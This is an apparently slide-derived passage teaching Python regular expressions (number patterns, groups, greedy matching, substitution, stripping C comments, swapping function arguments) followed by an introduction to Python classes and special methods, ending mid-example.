-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)? |

![]() | Scientific OR decimal OR integer notation:
-?(\d\.?\d*[Ee][+\-]?\d+|(\d+\.\d*|\d*\.\d+)|\d+)
or better (modularized):
real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real_sn = r'(\d\.?\d*[Ee][+\-]?\d+)'
real = '-?(' + real_sn + '|' + real_dn + '|' + real_in + ')'
|
![]() | Note: first test on the most complicated regex in OR expressions |
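As a quick check of the modularized regex, the sketch below applies it to the sample numbers from the earlier slides. The helper first_real and the name int_first are introduced here for illustration; the second regex shows the effect of putting the integer alternative first.

```python
import re

real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real_sn = r'(\d\.?\d*[Ee][+\-]?\d+)'
real = '-?(' + real_sn + '|' + real_dn + '|' + real_in + ')'

def first_real(text):
    """Hypothetical helper: return the first real number found in text, or None."""
    m = re.search(real, text)
    return m.group(0) if m else None

samples = ['-3', '42.9873', '1.23E+1', '1.2300E+01', '1.23e+01', '1e1', '3.']
matched = [first_real(s) for s in samples]

# Integer alternative first: the match stops after the leading digits.
int_first = r'-?(\d+|(\d+\.\d*|\d*\.\d+))'
truncated = re.search(int_first, '22.432').group(0)
```

Every sample is matched in full by real, whereas int_first stops at 22 for the text 22.432.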

![]() | Enclose parts of a regex in () to extract the parts:
pattern = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)"
# groups:      (  )          (   )      (  )
This defines three groups (t, iterations, eps) |
![]() | In Python code:
match = re.search(pattern, line)
if match:
    time = float(match.group(1))
    iter = int  (match.group(2))
    eps  = float(match.group(3))
|
![]() | The complete match is group 0 (here: the whole line) |

![]() | Aim: extract lower and upper limits of an interval:
[ -3.14E+00, 29.6524] |
![]() | Structure: bracket, real number, comma, real number, bracket, with embedded whitespace |

![]() | Regex for real numbers is a bit complicated |
![]() | Simpler: integer limits
pattern = r'\[\d+,\d+\]'
but this must be extended to handle embedded whitespace or negative numbers a la [ -3 , 29 ] |
![]() | Remedy:
pattern = r'\[\s*-?\d+\s*,\s*-?\d+\s*\]' |
![]() | Introduce groups to extract lower and upper limit:
pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]' |

>>> import re
>>> pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
>>> s = "here is an interval: [ -3, 100] ..."
>>> m = re.search(pattern, s)
>>> m.group(0)
'[ -3, 100]'
>>> m.group(1)
'-3'
>>> m.group(2)
'100'
>>> m.groups()     # tuple of all groups
('-3', '100')

![]() | Many groups? inserting a group in the middle changes other group numbers... |
![]() | Groups can be given logical names instead |
![]() | Standard group notation for interval:
# apply integer limits for simplicity: [int,int]
\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]
|
![]() | Using named groups:
\[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\] |
![]() | Extract groups by their names:
match.group('lower')
match.group('upper')
|
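A short sketch of named groups in use follows; the test string is the one from the interactive session above, and groupdict is the standard match-object method that returns all named groups at once.

```python
import re

interval = r'\[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\]'
m = re.search(interval, 'here is an interval: [ -3, 100] ...')

lower = int(m.group('lower'))   # access by name instead of by number
upper = int(m.group('upper'))
limits = m.groupdict()          # dictionary mapping group names to matched text
```

Inserting a further group into the regex later does not disturb code that refers to lower and upper by name.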

![]() | Interval with general real numbers:
real_short = r'\s*(-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*'
interval = r"\[" + real_short + "," + real_short + r"\]"
|
![]() | Example:
>>> m = re.search(interval, '[-100,2.0e-1]')
>>> m.groups()
('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
i.e., lots of (nested) groups; only group 1 and 5 are of interest
|

![]() | Real limits, previous regex resulted in the groups
('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
|
![]() | Downside: many groups, difficult to count right |
![]() | Remedy 1: use named groups for the outer left and outer right
groups:
real1 = \
r"\s*(?P<lower>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
real2 = \
r"\s*(?P<upper>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
interval = r"\[" + real1 + "," + real2 + r"\]"
...
match = re.search(interval, some_text)
if match:
    lower_limit = float(match.group('lower'))
    upper_limit = float(match.group('upper'))
|

![]() | Remedy 2: reduce the use of groups |
![]() | Avoid nested OR expressions (recall our first tries):
real_in = r"-?\d+"
real_sn = r"-?\d\.?\d*[Ee][+\-]\d+"
real_dn = r"-?\d*\.\d*"
real = r"\s*(" + real_sn + "|" + real_dn + "|" + real_in + r")\s*"
interval = r"\[" + real + "," + real + r"\]"
|
| Cost: (slightly) less general and safe regex |

![]() | re.findall finds all matches (re.search finds the first)
>>> r = r"\d+\.\d*"
>>> s = "3.29 is a number, 4.2 and 0.5 too"
>>> re.findall(r,s)
['3.29', '4.2', '0.5']
|
![]() | Application to the interval example:
lower, upper = re.findall(real, '[-3, 9.87E+02]')
# real: regex for real number with only one group!
|

![]() | If the regex contains groups, re.findall returns the contents of the groups instead of the complete matches - this might be confusing!
>>> r = r"(\d+)\.\d*"
>>> s = "3.29 is a number, 4.2 and 0.5 too"
>>> re.findall(r,s)
['3', '4', '0']
|
![]() | Application to the interval example:
>>> real_short = r"([+\-]?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)"
>>> # recall: real_short contains many nested groups!
>>> g = re.findall(real_short, '[-3, 9.87E+02]')
>>> g
[('-3', '3', '', ''), ('9.87E+02', '9.87', '.87', 'E+02')]
>>> limits = [ float(g1) for g1, g2, g3, g4 in g ]
>>> limits
[-3.0, 987.0]
|
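One further option, not covered in the slides above, is to turn the inner groups into non-capturing groups with the (?:...) syntax of the re module. The name real_nc is introduced here for illustration. With no capturing groups left, re.findall returns the complete matches directly.

```python
import re

# Same structure as real_short, but every group is non-capturing.
real_nc = r'[+\-]?(?:\d+(?:\.\d*)?|\d*\.\d+)(?:[eE][+\-]?\d+)?'

strings = re.findall(real_nc, '[-3, 9.87E+02]')
limits = [float(x) for x in strings]
```

This keeps the precise real-number regex while avoiding the tuple unpacking shown above.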

![]() | Regex is often a question of structure and context |
![]() | Simpler regex for extracting interval limits:
\[(.*),(.*)\] |
![]() | It works!
>>> l = re.search(r'\[(.*),(.*)\]',
' [-3.2E+01,0.11 ]').groups()
>>> l
('-3.2E+01', '0.11 ')
# transform to real numbers:
>>> r = [float(x) for x in l]
>>> r
[-32.0, 0.11]
|

![]() | Let us test the simple regex on a more complicated text:
>>> l = re.search(r'\[(.*),(.*)\]', \
' [-3.2E+01,0.11 ] and [-4,8]').groups()
>>> l
('-3.2E+01,0.11 ] and [-4', '8')
Regular expressions can surprise you...!
|
![]() | Regular expressions are greedy, they attempt to find the longest possible match, here from [ to the last (!) comma |
![]() | We want a shortest possible match, up to the first comma, i.e., a non-greedy match |
![]() | Add a ? to get a non-greedy match:
\[(.*?),(.*?)\] |
![]() | Now l becomes
('-3.2E+01', '0.11 ')
|
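The difference between the greedy and the non-greedy version can be seen side by side in this sketch, which uses re.findall so that both intervals in the test text are picked up.

```python
import re

text = ' [-3.2E+01,0.11 ]  and [-4,8]'

# Greedy: the first group runs all the way to the last comma.
greedy = re.findall(r'\[(.*),(.*)\]', text)
# Non-greedy: each group stops at the first possible position.
nongreedy = re.findall(r'\[(.*?),(.*?)\]', text)

intervals = [(float(lo), float(hi)) for lo, hi in nongreedy]
```

The greedy regex yields a single, wrong match spanning both intervals; the non-greedy one yields one pair per interval.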

![]() | Instead of using a non-greedy match, we can use
\[([^,]*),([^\]]*)\] |
![]() | Note: only the first match (here the first interval) is found by re.search, use re.findall to find all |

![]() | The simple regexes
\[([^,]*),([^\]]*)\]
\[(.*?),(.*?)\]
are not fool-proof:
>>> l = re.search(r'\[([^,]*),([^\]]*)\]',
' [e.g., exception]').groups()
>>> l
('e.g.', ' exception')
|
![]() | 100 percent reliable fix: use the detailed real number regex inside the parentheses |
![]() | The simple regex is ok for personal code |

![]() | Suppose we, in an input file to a simulator, can specify a grid using this syntax:
domain=[0,1]x[0,2] indices=[1:21]x[0:100]
domain=[0,15] indices=[1:61]
domain=[0,1]x[0,1]x[0,1] indices=[0:10]x[0:10]x[0:20]
|
![]() | Can we easily extract domain and indices limits and store them in variables? |

![]() | Specify a regex for an interval with real number limits |
![]() | Use re.findall to extract multiple intervals |
![]() | Problems: many nested groups due to complicated real number specifications |
![]() | Various remedies: as in the interval examples, see fdmgrid.py |
![]() | The bottom line: a very simple regex, utilizing the surrounding structure, works well |

![]() | We can get away with a simple regex, because of the surrounding structure of the text:
indices = r"\[([^:,]*):([^\]]*)\]"  # works
domain  = r"\[([^,]*),([^\]]*)\]"   # works
|
![]() | Note: these ones do not work:
indices = r"\[([^:]*):([^\]]*)\]"
indices = r"\[(.*?):(.*?)\]"
They match too much:
domain=[0,1]x[0,2] indices=[1:21]x[1:101]
       [.....................:
we need to exclude commas (i.e. left bracket, anything but comma or colon, colon, anything but right bracket)
|
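A minimal sketch of the grid extraction with the two working regexes follows. The function parse_grid is a hypothetical helper and is not taken from fdmgrid.py.

```python
import re

indices = r"\[([^:,]*):([^\]]*)\]"
domain = r"\[([^,]*),([^\]]*)\]"

def parse_grid(line):
    """Hypothetical helper: return (domain limits, index limits) for one input line."""
    dom = [(float(lo), float(hi)) for lo, hi in re.findall(domain, line)]
    ind = [(int(lo), int(hi)) for lo, hi in re.findall(indices, line)]
    return dom, ind

dom2, ind2 = parse_grid('domain=[0,1]x[0,2] indices=[1:21]x[0:100]')
dom3, ind3 = parse_grid('domain=[0,1]x[0,1]x[0,1] indices=[0:10]x[0:10]x[0:20]')
```

Each list holds one (lower, upper) pair per space direction, so the same code serves 1D, 2D and 3D grids.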

![]() | Split a string into words:
line.split(splitstring)
# or
string.split(line, splitstring)
|
![]() | Split wrt a regular expression:
>>> files = "case1.ps, case2.ps,  case3.ps"
>>> import re
>>> re.split(r",\s*", files)
['case1.ps', 'case2.ps', 'case3.ps']
>>> files.split(", ")  # a straight string split is undesired
['case1.ps', 'case2.ps', ' case3.ps']
>>> re.split(r"\s+", "some    words   in a text")
['some', 'words', 'in', 'a', 'text']
|
![]() |
Notice the effect of this:
>>> re.split(r" ", "some    words   in a text")
['some', '', '', '', 'words', '', '', 'in', 'a', 'text']
|

![]() | ...also called flags in Python regex documentation |
![]() | Check if a user has written "yes" as answer:
if re.search('yes', answer):
|
![]() | Problem: "YES" is not recognized; try a fix
if re.search(r'(yes|YES)', answer): |
![]() | Should allow "Yes" and "YEs" too...
if re.search(r'[yY][eE][sS]', answer): |
![]() | This is hard to read and case-insensitive matches occur frequently - there must be a better way! |

if re.search('yes', answer, re.IGNORECASE):
# pattern-matching modifier: re.IGNORECASE
# now we get a match for 'yes', 'YES', 'Yes' ...
# ignore case:
re.I or re.IGNORECASE
# let ^ and $ match at the beginning and
# end of every line:
re.M or re.MULTILINE
# allow comments and white space:
re.X or re.VERBOSE
# let . (dot) match newline too:
re.S or re.DOTALL
# let e.g. \w match special chars (å, æ, ...):
re.L or re.LOCALE

![]() | The re.X or re.VERBOSE modifier is very useful for inserting comments explaining various parts of a regular expression |
![]() | Example:
# real number in scientific notation:
real_sn = r"""
-? # optional minus
\d\.\d+ # a number like 1.4098
[Ee][+\-]\d\d? # exponent, E-03, e-3, E+12
"""
match = re.search(real_sn, 'text with a=1.92E-04 ',
re.VERBOSE)
# or when using compile:
c = re.compile(real_sn, re.VERBOSE)
match = c.search('text with a=1.9672E-04 ')
|

![]() | Substitute float by double:
# filestr contains a file as a string
filestr = re.sub('float', 'double', filestr)
|
![]() | In general:
re.sub(pattern, replacement, str) |
![]() | If there are groups in pattern, these are accessed by
\1        \2        \3        ...
\g<1>     \g<2>     \g<3>     ...
\g<lower> \g<upper> ...
in replacement |
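As an illustration of group references in the replacement string, the sketch below swaps the limits of every integer interval in a text, once with numbered and once with named groups. The test string is made up for the example.

```python
import re

numbered = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
named = r'\[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\]'

s = 'intervals: [ -3, 100] and [4,2]'

# \1 and \2 refer to the first and second group of the pattern.
by_number = re.sub(numbered, r'[\2, \1]', s)
# \g<name> refers to a named group.
by_name = re.sub(named, r'[\g<upper>, \g<lower>]', s)
```

Both calls produce the same text; the named version stays readable when the pattern grows.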

![]() | C-style comments could be nice to have in scripts for commenting out large portions of the code:
/*
while 1:
    line = file.readline()
    ...
...
*/
|
![]() | Write a script that strips C-style comments away |
![]() | Idea: match comment, substitute by an empty string |

![]() | Suggested regex for C-style comments:
comment = r'/\*.*\*/'
# read file into string filestr
filestr = re.sub(comment, '', filestr)
i.e., match everything between /* and */ |
![]() | Bad: . does not match newline |
![]() | Fix: re.S or re.DOTALL modifier makes . match newline:
comment = r'/\*.*\*/'
c_comment = re.compile(comment, re.DOTALL)
filestr = c_comment.sub('', filestr)
|
![]() | OK? No! |

/********************************************/
/* File myheader.h */
/********************************************/
#include <stuff.h> // useful stuff
class MyClass
{
/* int r; */ float q;
// here goes the rest class declaration
}
/* LOG HISTORY of this file:
* $ Log: somefile,v $
* Revision 1.2 2000/07/25 09:01:40 hpl
* update
*
* Revision 1.1.1.1 2000/03/29 07:46:07 hpl
* register new files
*
*/

![]() | The regex
/\*.*\*/ with re.DOTALL (re.S)
matches the whole file (i.e., the whole file is stripped away!) |
![]() | Why? a regex is by default greedy, it tries the longest possible match, here the whole file |
![]() | A question mark makes the regex non-greedy:
/\*.*?\*/ |

![]() | The non-greedy version works |
![]() | OK? Yes - the job is done, almost...
const char* str ="/* this is a comment */"
gets stripped away to an empty string... |
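The greedy and non-greedy comment regexes can be compared on a shortened version of the header file shown earlier. This is a minimal sketch; the variable names are chosen here for illustration.

```python
import re

source = """\
/* File myheader.h */
#include <stuff.h>
class MyClass
{
  /* int r; */ float q;
}
/* LOG HISTORY of this file:
 * update
 */
"""

greedy = re.compile(r'/\*.*\*/', re.DOTALL)
nongreedy = re.compile(r'/\*.*?\*/', re.DOTALL)

stripped_greedy = greedy.sub('', source)   # removes first /* through last */
stripped = nongreedy.sub('', source)       # removes each comment separately

# The remaining weakness: comment markers inside a string literal.
literal = nongreedy.sub('', 'const char* str ="/* this is a comment */";')
```

Handling the string-literal case properly requires more context than a single regex sees, which is why a real C parser is the safe route.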

![]() | Suppose you have written a C library which has many users |
![]() | One day you decide that the function
void superLibFunc(char* method, float x)
would be more natural to use if its arguments were swapped:
void superLibFunc(float x, char* method)
|
![]() | All users of your library must then update their application codes - can you automate? |

![]() | You want to locate all strings of the form
superLibFunc(arg1, arg2)
and transform them to
superLibFunc(arg2, arg1)
|
![]() | Let arg1 and arg2 be groups in the regex for the superLibFunc calls |
![]() | Write out
superLibFunc(\2, \1)
# recall: \1 is group 1, \2 is group 2 in a re.sub command
|

![]() | Basic structure of the regex of calls:
superLibFunc\s*\(\s*arg1\s*,\s*arg2\s*\)
but what should the arg1 and arg2 patterns look like? |
![]() | Natural start: arg1 and arg2 are valid C variable names
arg = r"[A-Za-z_0-9]+" |
![]() | Fix: digits are not allowed as the first character:
arg = "[A-Za-z_][A-Za-z_0-9]*" |

![]() | The regex
arg = "[A-Za-z_][A-Za-z_0-9]*"
works well for calls with variables, but we can call superLibFunc with numbers too:
superLibFunc ("relaxation", 1.432E-02);
|
![]() | Possible fix:
arg = r"[A-Za-z0-9_.\-+\"]+"
but the disadvantage is that arg now also matches
.+-32skj 3.ejks
|

![]() | Since arg2 is a float we can make a precise regex: legal C variable name OR legal real variable format
arg2 = r"([A-Za-z_][A-Za-z_0-9]*|" + real + \
"|float\s+[A-Za-z_][A-Za-z_0-9]*" + ")"
where real is our regex for formatted real numbers:
real_in = r"-?\d+"
real_sn = r"-?\d\.\d+[Ee][+\-]\d\d?"
real_dn = r"-?\d*\.\d+"
real = r"\s*("+ real_sn +"|"+ real_dn +"|"+ real_in +r")\s*"
|

![]() | We can now treat variables and numbers in calls |
![]() | Another problem: should swap arguments in a user's definition of the function:
void superLibFunc(char* method, float x)
to
void superLibFunc(float x, char* method)
Note: the argument names (x and method) can also be omitted! |
![]() | Calls and declarations of superLibFunc can be written on more than one line and with embedded C comments! |
![]() | Giving up? |

![]() | Instead of trying to make a precise regex, let us make a very simple one:
arg = '.+' # any text |
![]() | "Any text" may be precise enough since we have the surrounding structure,
superLibFunc\s*\(\s*arg\s*,\s*arg\s*\)
and assume that a C compiler has checked that arg is a valid C code text in this context |

![]() | A problem with .+ appears in lines with more than one call:
superLibFunc(a,x); superLibFunc(ppp,qqq); |
![]() | We get a match for the first argument equal to
a,x); superLibFunc(ppp |
![]() | Remedy: non-greedy regex (see later) or
arg = r"[^,]+"
This one matches multi-line calls/declarations, also with embedded comments (.+ does not match newline unless the re.S modifier is used) |

![]() |
Central code statements:
arg = r"[^,]+"
call = r"superLibFunc\s*\(\s*(%s),\s*(%s)\)" % (arg,arg)
# load file into filestr
# substitute:
filestr = re.sub(call, r"superLibFunc(\2, \1)", filestr)
# write out file again
fileobject.write(filestr)
|

![]() | Test text:
superLibFunc(a,x); superLibFunc(qqq,ppp);
superLibFunc ( method1, method2 );
superLibFunc(3method /* illegal name! */, method2 ) ;
superLibFunc( _method1,method_2) ;
superLibFunc (
method1 /* the first method we have */ ,
super_method4 /* a special method that
deserves a two-line comment... */
) ;
|
![]() | The simple regex successfully transforms this into
superLibFunc(x, a); superLibFunc(ppp, qqq);
superLibFunc(method2 , method1);
superLibFunc(method2 , 3method /* illegal name! */) ;
superLibFunc(method_2, _method1) ;
superLibFunc(super_method4 /* a special method that
deserves a two-line comment... */
, method1 /* the first method we have */ ) ;
|
![]() | Notice how powerful a small regex can be!! |
![]() | Downside: cannot handle a function call as argument |

![]() | The simple regex
[^,]+
breaks down for comments with comma(s) and function calls as arguments, e.g.,
superLibFunc(m1, a /* large, random number */);
superLibFunc(m1, generate(c, q2));
The regex will match the longest possible string ending with a comma, in the first line
m1, a /* large,
but then there are no more commas ... |
![]() | A complete solution should parse the C code |

![]() |
The superLibFunc call with comments and named groups:
call = re.compile(r"""
superLibFunc # name of function to match
\s* # possible whitespace
\( # parenthesis before argument list
\s* # possible whitespace
(?P<arg1>%s) # first argument plus optional whitespace
, # comma between the arguments
\s* # possible whitespace
(?P<arg2>%s) # second argument plus optional whitespace
\) # closing parenthesis
""" % (arg,arg), re.VERBOSE)
# the substitution command:
filestr = call.sub(r"superLibFunc(\g<arg2>, \g<arg1>)", filestr)
|
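The verbose regex and the substitution can be exercised on a few of the test lines with the following sketch. The wrapper function swap_args is introduced here for illustration; the last call shows the limitation noted above for a function call as argument.

```python
import re

arg = r"[^,]+"
call = re.compile(r"""
    superLibFunc     # name of function to match
    \s*\(\s*         # opening parenthesis with optional whitespace
    (?P<arg1>%s)     # first argument
    ,\s*             # comma between the arguments
    (?P<arg2>%s)     # second argument
    \)               # closing parenthesis
    """ % (arg, arg), re.VERBOSE)

def swap_args(code):
    """Hypothetical wrapper: swap the two arguments in every superLibFunc call."""
    return call.sub(r"superLibFunc(\g<arg2>, \g<arg1>)", code)

two_calls = swap_args("superLibFunc(a,x);  superLibFunc(qqq,ppp);")
spaced = swap_args("superLibFunc ( method1, method2 );")
nested = swap_args("superLibFunc(m1, generate(c, q2));")  # left unchanged
```

For the nested call the regex finds no match at all, so the text passes through untouched rather than being rewritten incorrectly.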

![]() | Goal: remove C++/Java comments from source codes |
![]() | Load a source code file into a string:
filestr = open(somefile, 'r').read()
# note: newlines are a part of filestr
|
![]() | Substitute comments // some text... by an empty string:
filestr = re.sub(r'//.*', '', filestr) |
![]() | Note: . (dot) does not match newline; if it did, we would need to say
filestr = re.sub(r'//[^\n]*', '', filestr) |

![]() | How will the substitution
filestr = re.sub(r'//[^\n]*', '', filestr)
treat a line like
const char* heading = "------------//------------";
??? |
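The question can be answered by running the substitution on that single line, as in this small sketch.

```python
import re

line = 'const char* heading = "------------//------------";'

# Everything from the first // to the end of the line is removed,
# even though the // sits inside a string literal.
stripped = re.sub(r'//[^\n]*', '', line)
```

The string literal is cut in half, so the stripped file would no longer compile.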

![]() |
The following useful function demonstrates how to extract
matches, groups etc. for examination:
def debugregex(pattern, str):
    s = "does '" + pattern + "' match '" + str + "'?\n"
    match = re.search(pattern, str)
    if match:
        s += str[:match.start()] + "[" + \
             str[match.start():match.end()] + \
             "]" + str[match.end():]
        if len(match.groups()) > 0:
            for i in range(len(match.groups())):
                s += "\ngroup %d: [%s]" % \
                     (i+1,match.groups()[i])
    else:
        s += "No match"
    return s
|

![]() |
Example on usage:
>>> print debugregex(r"(\d+\.\d*)",
"a= 51.243 and b =1.45")
does '(\d+\.\d*)' match 'a= 51.243 and b =1.45'?
a= [51.243] and b =1.45
group 1: [51.243]
|


![]() | Intro to the class syntax |
![]() | Special attributes |
![]() | Special methods |
![]() | Classic classes, new-style classes |
![]() | Static data, static functions |
![]() | Properties |
![]() | About scope |

![]() | Ch. 8.6 in the course book |
![]() | Python Tutorial |
![]() | Python Reference Manual (special methods in 3.3) |
![]() | Python in a Nutshell (OOP chapter - recommended!) |

![]() | Similar class concept as in Java and C++ |
![]() | All functions are virtual |
![]() | No private/protected variables (the effect can be "simulated") |
![]() | Single and multiple inheritance |
![]() | Everything in Python is an object (an instance of some class) and works with classes |
![]() | Class programming is easier and faster than in C++ and Java (?) |

![]() | Declare a base class MyBase:
class MyBase:
    def __init__(self,i,j):  # constructor
        self.i = i; self.j = j
    def write(self):         # member function
        print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the declaration, but not in the call
inst1 = MyBase(6,9); inst1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
    def __init__(self,i,j,k):  # constructor
        MyBase.__init__(self,i,j)
        self.k = k
    def write(self):
        print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write func:
def write(v): v.write()
# make a MySub instance
i = MySub(7,8,9)
write(i)   # will call MySub's write
|

![]() | Consider
def write(v):
    v.write()
write(i)   # i is MySub instance
|
![]() | In C++/Java we would declare v as a MyBase reference and rely on i.write() as calling the virtual function write in MySub |
![]() | The same works in Python, but we do not need inheritance and virtual functions here: v.write() will work for any object v that has a callable attribute write that takes no arguments |
![]() | Object-orientation in C++/Java for parameterizing types is not needed in Python since variables are not declared with types |

![]() | There is no technical way of preventing users from manipulating data and methods in an object |
![]() | Convention: attributes and methods starting with an underscore are treated as non-public (``protected'') |
![]() | Names starting with a double underscore are considered strictly private (Python mangles the class name into the attribute name in this case: an attribute __some defined in class MyClass is actually stored under the name _MyClass__some) |
class MyClass:
    def __init__(self):
        self._a = False  # non-public
        self.b = 0       # public
        self.__c = 0     # private

![]() | Dictionary of user-defined attributes:
>>> i1.__dict__ # dictionary of user-defined attributes
{'i': 5, 'j': 7}
>>> i2.__dict__
{'i': 7, 'k': 9, 'j': 8}
|
![]() | Name of class, name of method:
>>> i2.__class__.__name__  # name of class
'MySub'
>>> i2.write.__name__      # name of method
'write'
|
![]() | List names of all methods and attributes:
>>> dir(i2)
['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'write']
|

![]() | Use isinstance for testing class type:
if isinstance(i2, MySub):
    # treat i2 as a MySub instance
|
![]() | Can test if a class is a subclass of another:
if issubclass(MySub, MyBase):
    ...
|
![]() | Can test if two objects are of the same class:
if inst1.__class__ is inst2.__class__:
(is checks object identity, == checks for equal contents) |
![]() | a.__class__ refers to the class object of instance a |

![]() | Attributes can be added at run time (!)
>>> class G: pass

>>> g = G()
>>> dir(g)
['__doc__', '__module__']  # no user-defined attributes
>>> # add instance attributes:
>>> g.xmin=0; g.xmax=4; g.ymin=0; g.ymax=1
>>> dir(g)
['__doc__', '__module__', 'xmax', 'xmin', 'ymax', 'ymin']
>>> g.xmin, g.xmax, g.ymin, g.ymax
(0, 4, 0, 1)
>>> # add static variables:
>>> G.xmin=0; G.xmax=2; G.ymin=-1; G.ymax=1
>>> g2 = G()
>>> g2.xmin, g2.xmax, g2.ymin, g2.ymax  # static variables
(0, 2, -1, 1)
|

![]() | Can work with __dict__ directly:
>>> i2.__dict__['q'] = 'some string'
>>> i2.q
'some string'
>>> dir(i2)
['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'q', 'write']
|

![]() | Special methods have leading and trailing double underscores (e.g. __str__) |
![]() | Here are some operations defined by special methods:
len(a)             # a.__len__()
c = a*b            # c = a.__mul__(b)
a = a+b            # a = a.__add__(b)
a += c             # a.__iadd__(c)
d = a[3]           # d = a.__getitem__(3)
a[3] = 0           # a.__setitem__(3, 0)
f = a(1.2, True)   # f = a.__call__(1.2, True)
if a:              # if a.__len__()>0: or if a.__nonzero__():
|

![]() | Suppose we need a function of x and y with three additional parameters a, b, and c:
def f(x, y, a, b, c):
    return a + b*x + c*y*y
|
![]() | Suppose we need to send this function to another function
def gridvalues(func, xcoor, ycoor, file):
    for i in range(len(xcoor)):
        for j in range(len(ycoor)):
            f = func(xcoor[i], ycoor[j])
            file.write('%g %g %g\n' % (xcoor[i], ycoor[j], f))
func is expected to be a function of x and y only (many libraries need to make such assumptions!)
|
![]() | How can we send our f function to gridvalues? |

![]() | Solution 1: global parameters
global a, b, c
...
def f(x, y):
    return a + b*x + c*y*y
...
a = 0.5; b = 1; c = 0.01
gridvalues(f, xcoor, ycoor, somefile)
Global variables are usually considered evil
|
![]() | Solution 2: keyword arguments for parameters
def f(x, y, a=0.5, b=1, c=0.01):
    return a + b*x + c*y*y
...
gridvalues(f, xcoor, ycoor, somefile)
useless for other values of a, b, c
|

![]() | Make a class with function behavior instead of a pure function |
![]() | The parameters are attributes of the class instance |
![]() | Class instances can be called as ordinary functions, now with x and y as the only formal arguments
class F:
    def __init__(self, a=1, b=1, c=1):
        self.a = a; self.b = b; self.c = c
    def __call__(self, x, y):   # special method!
        return self.a + self.b*x + self.c*y*y
f = F(a=0.5, c=0.01)
# can now call f as
v = f(0.1, 2)
...
gridvalues(f, xcoor, ycoor, somefile)
|
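The callable-class solution can be run as a complete sketch by writing to an in-memory file. Using io.StringIO as the file object is an assumption made here for the sake of a self-contained example (it needs Python 3 for plain strings); the coordinate lists are made up.

```python
import io

def gridvalues(func, xcoor, ycoor, file):
    """Write x, y and func(x, y) for all grid points, one point per line."""
    for x in xcoor:
        for y in ycoor:
            file.write('%g %g %g\n' % (x, y, func(x, y)))

class F(object):
    def __init__(self, a=1, b=1, c=1):
        self.a = a; self.b = b; self.c = c
    def __call__(self, x, y):   # makes instances callable as f(x, y)
        return self.a + self.b*x + self.c*y*y

f = F(a=0.5, c=0.01)
out = io.StringIO()             # in-memory stand-in for a real file
gridvalues(f, [0, 1], [0, 2], out)
lines = out.getvalue().splitlines()
```

gridvalues never learns about a, b and c; it only sees an object that can be called with two arguments.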

![]() | __init__(self [, args]): constructor |
![]() | __del__(self): destructor (seldom needed since Python offers automatic garbage collection) |
![]() | __str__(self): string representation for pretty printing of the object (called by print or str) |
![]() | __repr__(self): string representation for initialization (a==eval(repr(a)) is true) |

![]() | __eq__(self, x): for equality (a==b), should return True or False |
![]() | __cmp__(self, x): for comparison (<, <=, >, >=, ==, !=); return negative integer, zero or positive integer if self is less than, equal or greater than x (resp.) |
![]() | __len__(self): length of object (called by len(x)) |
![]() | __call__(self [, args]): calls like a(x,y) implies a.__call__(x,y) |

![]() | __getitem__(self, i): used for subscripting: b = a[i] |
![]() | __setitem__(self, i, v): used for subscripting: a[i] = v |
![]() | __delitem__(self, i): used for deleting: del a[i] |
![]() | These three functions are also used for slices: a[p:q:r] implies that i is a slice object with attributes start (p), stop (q) and step (r)
b = a[:-1]  # implies b = a.__getitem__(i)
isinstance(i, slice) is True
i.start is None
i.stop is -1
i.step is None
|
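The slice object passed to __getitem__ can be inspected with a small sketch. The class Recorder is hypothetical and only stores the index object it receives before delegating to a list.

```python
class Recorder(object):
    """Hypothetical container that remembers the last index object it received."""
    def __init__(self, data):
        self.data = list(data)
        self.last_index = None

    def __getitem__(self, i):
        self.last_index = i       # an int for a[3], a slice object for a[p:q:r]
        return self.data[i]

a = Recorder([10, 20, 30, 40])
b = a[:-1]                        # calls a.__getitem__(slice(None, -1, None))
i = a.last_index
```

After the call, i is a slice object whose start and step are None and whose stop is -1.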

![]() | __add__(self, b): used for self+b, i.e., x+y implies x.__add__(y) |
![]() | __sub__(self, b): self-b |
![]() | __mul__(self, b): self*b |
![]() | __div__(self, b): self/b |
![]() | __pow__(self, b): self**b or pow(self,b) |

![]() | __iadd__(self, b): self += b |
![]() | __isub__(self, b): self -= b |
![]() | __imul__(self, b): self *= b |
![]() | __idiv__(self, b): self /= b |

![]() | __radd__(self, b): This method defines b+self, while __add__(self, b) defines self+b. If a+b is encountered and a does not have an __add__ method, b.__radd__(a) is called if it exists (otherwise a+b is not defined). |
![]() | Similar methods: __rsub__, __rmul__, __rdiv__ |
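A minimal sketch of __add__ together with __radd__ follows. The class Vec2 is hypothetical. Note that for built-in left operands such as int, Python falls back to __radd__ because the built-in __add__ signals that it cannot handle the right operand.

```python
class Vec2(object):
    """Hypothetical 2D vector supporting vector + vector, vector + number, number + vector."""
    def __init__(self, x, y):
        self.x = x; self.y = y

    def __add__(self, other):          # self + other
        if isinstance(other, Vec2):
            return Vec2(self.x + other.x, self.y + other.y)
        return Vec2(self.x + other, self.y + other)

    def __radd__(self, other):         # other + self, tried when other cannot add a Vec2
        return self.__add__(other)

    def __eq__(self, other):
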